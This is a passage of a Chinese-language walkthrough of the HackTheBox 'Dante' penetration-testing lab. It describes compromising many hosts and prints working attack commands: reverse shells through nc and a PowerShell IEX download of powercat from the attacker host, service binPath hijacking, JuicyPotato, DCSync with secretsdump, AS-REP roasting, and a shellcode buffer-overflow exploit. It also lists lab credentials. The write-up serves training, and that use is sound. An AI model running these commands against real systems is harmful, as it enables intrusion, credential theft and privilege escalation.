此时已经上传好了webshell了，只不过webshell的格式蚁剑连不上，依然把上面免杀之后的马上传，然后蚁剑连接即可：

flag在blake桌面目录下的flag.txt中

MinatoTW strikes again

接着上传一个利用msfvenom生成的马，然后执行得到一个meterpreter，得到meterpreter之后直接getsystem拿到system权限：

至此DANTE-WS03也打完了。

That just blew my mind

接下来看172.16.1.20，fscan扫描结果显示开放了22、80、135、139、443、445以及88端口。既然开放了88端口，那有可能是一台域控。fscan还显示存在ms17-010漏洞，那么用直接msf打就可以了：

拿到meterpreter之后，直接就是system权限。之后我们会在katwamba的桌面目录下看到一个叫职工备份的xlsx文件：

我们把它下载下来：

观察这里，B列被隐藏了：

我们将它还原出后，可以得到A列username，B列password。对了，执行net user mrb3n有惊喜哦。之后我们通过调用msf的kiwi模块可以抓取到一对帐号密码，xadmin:Peacemaker!，还是一个域管。不过令人悲伤的是，dante.local这个域中似乎只有DANTE-DC01这一台机子了，以下是通过ldapsearch搜索得到的结果：

# proxychains4 ldapsearch -x -H ldap://172.16.1.20:389 -D "CN=xadmin,CN=Users,DC=DANTE,DC=local" -w Peacemaker! -b "DC=DANTE,DC=local" "(&(objectCategory=computer)(objectClass=computer))" CN | grep cn  
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.1.20:389  ...  OK
cn: DANTE-DC01

因此拿到域管账户似乎也无济于事。

Update the policy!

那接着我们看172.16.1.101这台机子，nmap扫描之后开放的端口有21、135、139、445、5040、5985。之后尝试ftp匿名登录，无果。尝试利用之前excel中拿到的username和password爆破：

得到一组可以成功登录ftp的帐号密码：dharding:WestminsterOrange5，ftp登录后，得到一个叫”Remote login.txt“的文件，文件内容如下所示：

Dido,
I've had to change your account password due to some security issues we have recently become aware of

It's similar to your FTP password, but with a different number (ie. not 5!)

Come and see me in person to retrieve your password.

thanks,
James

提示dharding的账户密码与FTP密码类似，只是最后一位数字5发生了改变，那我们先用for循环生成一个密码字典：

for i in {0..100};do echo "WestminsterOrange$i" >> pass1.txt;done

之后用cme开始爆破，成功得到账户密码为dharding:WestminsterOrange17：

用evil-winrm登录即可在桌面拿到flag：

Single or double quotes

之后我们可以在“C:\Program Files (x86)\IObit”目录下看到“IObit Uninstaller”，查看IObit Uninstaller目录下的History.txt：

该版本的IObit Uninstaller存在通过可信任服务路径提权的问题。但是此处我们却不是通过这个问题来提权的，我们执行一下cmd.exe /c "sc qc IObitUnSvr"，结果如下：

可以看到IObitUnSvr服务的二进制路径中已经不存在空格了。但是这个服务是以system权限启动的，所以我们可能仍然需要通过这个服务来提权，只是需要另寻它法。因为这台机子powershell的执行策略，我们不能直接使用Get-ServiceAcl.ps1获取服务的ACL，执行Get-ExecutionPolicy可以看到执行策略显示Restricted：

直接执行Set-ExecutionPolicy Unrestricted又会提示我们拒绝更改。可以利用以下语句查看：

powershell -ExecutionPolicy Bypass -Command "& {Import-Module C:\Users\dharding\Documents\Get-ServiceAcl.ps1;'IObitUnSvr' | Get-ServiceAcl | select -ExpandProperty Access}"

结果为：

可以看到dharding用户拥有查询、更改“IObitUnSvr”服务配置的权限，还拥有开始和关闭该服务的权限。那这直接改IObitUnSvr服务的二进制路径不就直接getsystem了吗？接下来我们上传一个nc程序，之后利用以下语句更改服务的二进制程序路径：

sc.exe config IObitUnSvr binPath="cmd.exe /c C:\Users\dharding\Desktop\nc64.exe -e cmd.exe 10.10.14.2 1238"

执行之后再次查看服务配置，可以看到二进制程序路径已经发生了改变：

之后sc stop IObitUnSvr再sc start IObitUnSvr重启服务，即可拿到system shell：

An open goal

接着我们看172.16.1.5这台机子，fscan扫描结果显示开放了21、135、139、445以及1433端口，1433端口一般被mssql占用。 首先ftp匿名登录，拿到第一个flag：

因为没有帐号和密码，我们无法连接smb和mssql，因此这台机子先暂时搁置。打后面的机子再看看有没有线索。

It’s getting hot in here

因为之前的Dante-DC01通过ms17-010打经常session维持不起来，没一会儿就掉了，所以我这里是利用之前得到的域管帐号通过evil-winrm登录进去，并上传msf马，运行木马拿到的meterpreter。，执行ipconfig之后看到有三张网卡：

猜测可能还存在一个网段，利用以下cmd命令扫一下172.16.2.0/24这个段吧：

(for /L %a IN (1,1,254) DO ping /n 1 /w 1 172.16.2.%a) | find "Reply"

发现还有一台IP为172.16.2.5的主机。之后添加路由，把172.16.2.0/24这个段给添加进来（run autoroute -s 172.16.2.0/24），扫一波端口：

这台主机运行着DNS、Kerberos还有LDAP，应该又是一台DC。建立一条代理：

之后我们会通过这条代理打172.16.2.5。故技重施利用ms17-010打172.16.2.5，没成功：

那接下来就对域内用户进行枚举吧。了解Kerberos协议的师傅应该知道域内用户枚举的原理，大致就是因为AS_REQ发送的请求包中cname字段的正确与否，导致AS_REP响应包的不同来进行枚举的。首先我们进行端口转发，把88端口和53端口转发到本地：

portfwd add -L 127.0.0.1 -l 53 -p 53 -r 172.16.2.5
portfwd add -L 127.0.0.1 -l 88 -p 88 -r 172.16.2.5

之后使用kerbrute进行域用户名枚举，用户名字典是之前从excel文件中读到那些username：

之后利用cme爆破密码，跑了一夜，睡觉去了，醒来发现没结果，我知道是时候放弃直接爆破密码了。此时我们手上已经有了一个域用户的username，但没有该用户的密码，因此无法进行Kerberoasting攻击，但是可以进行AS_REP Roasting攻击。AS_REP Roasting攻击是因为域用户勾选了”不要求Kerberos预身份验证“的选项，攻击者进行AS_REQ之后，KDC会不作任何验证便将 TGT 票据和加密的 Session-key 等信息返回，即AS_REP。攻击者可以对由用户的NTLM Hash加密之后的Session-key 进行离线破解，如果爆破成功，就能得到该指定用户的明文密码。 impacket的GetNPUsers.py脚本为我们提供了进行AS_REP Roasting攻击的工具：

之后我们利用john对该Hash进行爆破：

之后利用evil-winrm登录就行了，Desktop目录下拿到flag：

One misconfig to rule them all

之后我们上传SharpHound.exe采集数据，导入进BloodHound，点击分析里的Find Principalswith DCSync Rights选项卡，可以发现jbercov可以对dante.admin域进行DCSync攻击。利用impacket的secretsdump.py脚本进行攻击：

proxychains4 -q python3 secretsdump.py dante/jbercov:myspace7@172.16.2.5 -just-dc-user Administrator

抓到了Administrator的密码Hash：

之后我们可以通过PTH的方法配合使用psexec工具来拿到system权限：

也可以通过msf的psexec模块来返回一个meterpreter：

之后我们上传chisel，创建一条代理：

在C:\Users\Administrator\Documents目录处存在一个Jenkins.bat文件，内容为：

net user Admin_129834765 SamsungOctober102030 /add

We’re going in circles

在172.16.1.19的8080端口上运行着Jenkins服务，利用密码可以成功登录：

接着我们进入/script目录，利用以下语句进行命令执行：

println "ls -al".execute().text

之后拿到meterpreter，此时用户为jenkins:

之后上传pspy发现以下进程：

2023/05/13 10:23:01 CMD: UID=0    PID=12129  | /bin/sh -c /bin/bash mysql -u ian -p VPN123ZXC

得到一组帐号密码：ian:VPN123ZXC，直接su切换至ian用户，发现在disk组里：

hacktricks里对disk组提权的方法进行了介绍：https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#disk-group 首先我们看看/dev设备里有哪些所属组是disk：

之后执行df -h看看根目录被挂载到了哪里：

根目录被挂在到了/dev/sda5，之后就与hacktricks中介绍的方法类似了：

My cup runneth over

接下来我们在DC02中执行如下cmd命令来探测172.16.2.0/24网段的存活主机：

(for /L %a IN (1,1,254) DO ping /n 1 /w 1 172.16.2.%a) | find "Reply"

结果为：

该网段还存在一个IP为172.16.2.101的主机，使用auxiliary/scanner/portscan/tcp模块探测一下开放的端口，发现开放了22端口。我们将22端口转发到本地：

尝试爆破一下ssh帐号和密码，用户名字典和密码字典都是从之前的excel文件中得到的。还记得我们之前爆破得出的julian:manchesterunited这对帐号密码吗？我们将它一起添加进字典中，使用hydra爆破，结果正是之前得到的julian：

接着用ssh登录后，尝试SUID提权：

发现/usr/sbin/readfile被设置了SUID位，复制到本地，利用https://dogbolt.org/ 在线反编译站点对这个二进制文件进行反编译，观察Ghidra模块，其中主函数如下所示：

首先判断我们是否传入了参数，如果没有则输出"Syntax: %s </path/to/file>\n。否则，就将真实、有效且已保存的用户或组ID设置为root。接下来还调用了strcpy()函数，将用户输入param2复制到local_58缓冲区。local_58缓冲区长度为80,如果超过80,则会导致缓冲区溢出，并且可以用来获得主机上的root访问权限。 接下来我们执行gdb readfile，gdb还安装了peda插件，执行checksec检查二进制的各种安全选项：

之后，我们检查ASLR：

cat /proc/sys/kernel/randomize_va_space

可以看到，ASLR被关闭。使用gdb，我们生成一个100字节的模式，并使用r参数运行程序：

可以看到RSP指向我们有效载荷的一部分（AAKAAgAA6AAL）。我们搜索这个偏移量在哪里

偏移量是88，因此我们用python生成88个’A’和8个’B’：

可以看到RSP被8个’B’给填满。我们可以把B替换为我们shellcode的地址。64位的shellcode可以从这里调用/bin/sh，其中”\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05”一共是27个byte，接着我们执行下面的代码：

r $(python2 -c 'print "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" + "A"*(88-27) + "B"*6')

我们将使用以下命令分析堆栈的前120个字节：

没找到shellcode，可以通过删除200个字节来分析RSP之前的内存内容：

此时找到了shellcode。shellcode出现在内存表示中的第二个八位字节中。下一个地址是0x7fffffffe378。我们可以通过从下一个字节中删除8个字节来计算shellcode地址，0x7fffffffe370。之后我们用这个地址来代替这些’B’：

可以看到已经成功进入shell了，可是执行id之后发现是julian：

这很正常，因为gdb调试二进制文件的时候不会提升权限。接着我们执行/usr/sbin/readfile $(python2 -c 'print "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" + "A"*(88-27) + "\x70\xe3\xff\xff\xff\x7f"')，结果为：

这里的原因是gdb在堆栈中保留了一些环境变量，因此我们的shellcode在有gdb和没有gdb的情况下有不同的地址。 我们可以通过将外壳代码存储在env变量中来执行相同的攻击，然后可以指向堆栈到此变量的地址：

export SHELLCODE=`python2 -c 'print"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"'`

SHELLCODE变量的地址可以通过以下代码获得：

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
    
int main(int argc, char *argv[]) {
  char *ptr;
    
  if(argc < 3) {
    printf("Usage: %s <environment variable> <target program name>\n", argv[0]);
    exit(0);
  }
  ptr = getenv(argv[1]); /* get env var location */
  ptr += (strlen(argv[0]) - strlen(argv[2]))*2; /* adjust for program name */
  printf("%s will be at %p\n", argv[1], ptr);
}

之后我们编译上面这段代码并运行生产的二进制文件：

gcc getenv.c -o getenv && chmod +x getenv && ./getenv SHELLCODE /usr/sbin/readfile

最后我们调整调用，这次使用了新地址，成功getroot：

What do we have here?!

接着我们再在这台机子上通过以下命令来查看存活主机：

for i in {1..255} ;do (ping -c 1 172.16.2.$i | grep "bytes from"|cut -d ' ' -f4|tr -d ':' &);done

找到了一台新机子，IP为172.16.2.6。通过扫描端口，发现开启了22端口和631端口，我们再次使用julian的帐号连上去，可以直接拿到flag：

接着我们在Desktop目录下找到一个SQL文件，文件内容为：

julian@DANTE-ADMIN-NIX06:~/Desktop$ cat SQL
Hi Julian
I've put this on your personal desktop as its probably the most secure 
place on the network!

Can you please ask Sophie to change her SQL password when she logs in
again? I've reset it to TerrorInflictPurpleDirt996655 as it stands, but
obviously this is a tough one to remember

Maybe we should all get password managers?

Thanks,
James

得到一组帐号密码sophie:TerrorInflictPurpleDirt996655。

It doesn’t get any easier than this

之后还可以在home目录下找到一个名为plongbottom的用户，而这个用户也正好在我们之前得到的那个excel文件里。因此我们直接su切换至该用户。之后执行sudo -l后，发现可以sudo执行任何命令，那直接sudo去看root目录下的flag即可：

Fail 2: The Sequel

接下来，我们回过头来看172.16.1.5这台机子，之前因为没有线索而将它暂时搁置了。现在我们拿到了sophie的帐号密码，可以尝试登录一下了。利用impacket中的mssqlclient可以进行登录：

接着开始提权，首先执行select is_srvrolemember('sysadmin');判断当前是否为DBA权限，为1则可以提权：

接着我们 查看能否使用 xp_cmdshell，从MSSQL2005版本之后默认关闭： select count(*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell'

可以使用xp_cmdshell，我这里使用powercat来反弹shell：

xp_cmdshell "powershell IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.2:1241/powercat.ps1\");powercat -c 10.10.14.2 -p 1242 -e cmd"

在C:\DB_backups目录下发现一个名叫db_backup.ps1的文件，尝试读取：

db_backup.ps1


# Work in progress database backup script. Adapting from mysql backup script. Does not work yet. Do not use.

$password = 'Alltheleavesarebrown1'
$user = 'sophie'
$cred = New-Object System.Net.NetworkCredential($user, $password, "")

$date = Get-Date
$dateString = $date.Year.ToString() + "-" + $date.Month.ToString() + "-" + $date.Day.ToString()

#Create symbolic link for sqldump.exe in the script folder
$sqldumpLocation = \.sqldump.exe
$backupDest = C:\DB_backups\SQL\sql_backup_"+ $dateString + ".sql"

$execute_sqldump = $sqldumpLocation+" -u"+$cred.UserName+" -p"+$cred.Password +" > " + $backupDest


invoke-expression $execute_sqldump


# use 7zip to compress and encrypt the backup with same password as used to autheticate the sql backup user
# removes the unencrypted .sql file afterwards
# create symbolic link for 7z.exe in the script folder
$sevenzip = ".#7z.exe"
$zipfile = $backupDest.Replace(".sql",".7z")
$execute7zip = $sevenzip+" a -t7z "+$zipfile+" "+$backupDest+" -p"+$cred.Password
invoke-expression $execute7zip
Remove-Item $backupDest

找到一组系统密码sophie:Alltheleavesarebrown1，接着我们用evil-winrm连接一下：

连接成功，在Users目录下看到flag。

I prefer mine with the skins on

接下来我们执行一下whoami /all：

发现该用户有SeAssignPrimaryTokenPrivilege特权。我们知道令牌创建进程使用的CreateProcessAsUserA这个API要求用户必须拥有SeAssignPrimaryTokenPrivilege特权，因此接下来我们可以进行令牌窃取以提升至system权限。我这里使用的工具是juicy potato。首先上传juicy potato和msf生成的马，之后执行以下命令反弹meterpreter：

cmd.exe /c "JuicyPotato.exe -t u -p C:\Users\sophie\Documents\shell-1243.exe -l 1243 -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}"

因为我们使用的是CreateProcessAsUserA这个API，因此-t参数的值为u，-c参数为对应操作系统的COM对象的CLSID，这台主机是windows server 2016的，可以选择的对象有COMXblGameSave，其CLSID为{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}。 至此，最后一台主机的system权限也已经拿到了。打完，收工！

证书

最后贴一波证书吧：